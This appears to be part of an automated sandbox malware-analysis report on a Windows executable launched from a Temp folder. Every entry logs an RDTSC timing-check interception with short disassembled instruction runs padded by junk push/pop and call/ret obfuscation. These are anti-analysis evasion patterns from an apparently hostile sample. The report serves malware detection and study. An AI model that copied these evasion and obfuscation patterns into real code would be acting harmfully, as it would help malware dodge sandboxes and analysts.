Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B84B7 second address: 6B84CE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F3B64CCE606h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B8F2F second address: 6B8F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B8F33 second address: 6B8F4E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F3B64CCE60Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B8F4E second address: 6B8F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6B9E13 second address: 6B9E17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BAE59 second address: 6BAE5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BA674 second address: 6BA67A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BAE5D second address: 6BAE7E instructions: 0x00000000 rdtsc 0x00000002 js 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F3B648E95F8h 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 jns 00007F3B648E95F8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BA67A second address: 6BA67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BB8B7 second address: 6BB903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov esi, dword ptr [ebp+122D3A7Eh] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F3B648E95F8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b and esi, dword ptr [ebp+12467AC1h] 0x00000031 push 00000000h 0x00000033 js 00007F3B648E95F9h 0x00000039 mov di, ax 0x0000003c mov dword ptr [ebp+122D29CFh], esi 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BB903 second address: 6BB91C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BB91C second address: 6BB922 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BB922 second address: 6BB926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BB926 second address: 6BB939 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BB939 second address: 6BB951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BB951 second address: 6BB956 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BC39F second address: 6BC3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BC161 second address: 6BC16B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BC3A5 second address: 6BC3A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BD8B6 second address: 6BD8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B648E9607h 0x00000008 jns 00007F3B648E95F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BD8DF second address: 6BD8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6C3DEC second address: 6C3DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BEBE1 second address: 6BEBE7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6C1ADE second address: 6C1B3D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 or dword ptr [ebp+1245C9E8h], edi 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F3B648E95F8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 mov edi, dword ptr [ebp+122D3A8Ah] 0x0000003b mov eax, dword ptr [ebp+122D0161h] 0x00000041 mov di, cx 0x00000044 push FFFFFFFFh 0x00000046 or dword ptr [ebp+122D2BEBh], eax 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f je 00007F3B648E95FCh 0x00000055 jns 00007F3B648E95F6h 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6C3F81 second address: 6C3F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F3B64CCE60Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6C3F91 second address: 6C3F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6C7031 second address: 6C703E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6C816F second address: 6C8174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CA269 second address: 6CA270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CB32C second address: 6CB3D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F3B648E95F8h 0x0000000f popad 0x00000010 nop 0x00000011 movzx edi, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F3B648E95F8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 or di, 4B03h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007F3B648E95F8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Dh 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 jnl 00007F3B648E95F9h 0x00000057 xchg eax, esi 0x00000058 jmp 00007F3B648E9600h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 jmp 00007F3B648E9607h 0x00000066 pop edi 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CC3AB second address: 6CC3FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE619h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+122DB644h], eax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007F3B64CCE608h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov di, 8EF1h 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push esi 0x00000039 pop esi 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CC3FC second address: 6CC42C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E95FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B648E9609h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CA38A second address: 6CA391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CA45E second address: 6CA468 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3B648E95F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CA468 second address: 6CA481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B64CCE615h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CD2DB second address: 6CD378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E95FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F3B648E95F8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 stc 0x00000025 push 00000000h 0x00000027 call 00007F3B648E9609h 0x0000002c and bx, 638Bh 0x00000031 pop ebx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F3B648E95F8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000016h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 push edi 0x00000051 jmp 00007F3B648E9605h 0x00000056 pop edi 0x00000057 push edi 0x00000058 push edi 0x00000059 pop edi 0x0000005a pop edi 0x0000005b popad 0x0000005c push eax 0x0000005d push edi 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CD378 second address: 6CD37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D0A70 second address: 6D0A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6CB53C second address: 6CB557 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3B64CCE60Ch 0x00000008 jc 00007F3B64CCE606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 jno 00007F3B64CCE606h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D30CC second address: 6D30D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D30D0 second address: 6D30F4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3B64CCE606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3B64CCE618h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D30F4 second address: 6D3145 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jno 00007F3B648E960Fh 0x00000010 push 00000000h 0x00000012 mov edi, eax 0x00000014 push 00000000h 0x00000016 jmp 00007F3B648E9608h 0x0000001b mov ebx, 7F7ECFA5h 0x00000020 push eax 0x00000021 pushad 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D3145 second address: 6D314B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D40CD second address: 6D40D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D40D3 second address: 6D40D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D40D7 second address: 6D4138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 call 00007F3B648E95FDh 0x0000000e movsx edi, di 0x00000011 pop edi 0x00000012 push 00000000h 0x00000014 js 00007F3B648E95FCh 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F3B648E95F8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F3B648E9601h 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D4138 second address: 6D413D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D5143 second address: 6D5147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D98F7 second address: 6D9915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D9915 second address: 6D991A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6DDC7B second address: 6DDC83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6DD4AE second address: 6DD4C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3B648E9603h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6DD647 second address: 6DD64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6DD64B second address: 6DD651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6E408D second address: 6E4091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6E556D second address: 6E5596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jng 00007F3B648E9608h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6E5596 second address: 6E559C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6E559C second address: 6E55B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B648E9604h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6E56CB second address: 6E56D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6E56D4 second address: 6E56D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6E56D8 second address: 6E56DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D0BC6 second address: 6D0BF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B648E9602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3B648E9609h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D332E second address: 6D333F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 je 00007F3B64CCE60Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6D43A2 second address: 6D43C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E9606h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6EB23A second address: 6EB275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE616h 0x00000007 jmp 00007F3B64CCE615h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F3B64CCE60Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6EB275 second address: 6EB28A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E9601h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6EB7E0 second address: 6EB7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6EB7E4 second address: 6EB800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B648E9606h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6EB800 second address: 6EB82D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE613h 0x00000007 pushad 0x00000008 jmp 00007F3B64CCE613h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6EC38C second address: 6EC392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6EC392 second address: 6EC3AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B64CCE614h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6EC3AF second address: 6EC3B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BF54C second address: 6A0933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B64CCE613h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3B64CCE612h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007F3B64CCE608h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+12493294h] 0x00000030 jbe 00007F3B64CCE614h 0x00000036 pushad 0x00000037 mov esi, dword ptr [ebp+122D2F74h] 0x0000003d mov dword ptr [ebp+122D221Ah], edx 0x00000043 popad 0x00000044 push eax 0x00000045 jmp 00007F3B64CCE60Dh 0x0000004a mov dword ptr [esp], eax 0x0000004d mov dh, 76h 0x0000004f sub dword ptr [ebp+122D1F9Fh], edi 0x00000055 call dword ptr [ebp+122D2BBEh] 0x0000005b jmp 00007F3B64CCE610h 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 pushad 0x00000064 popad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BF95F second address: 6BF965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	RDTSC instruction interceptor: First address: 6BFC5D second address: 6BFC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
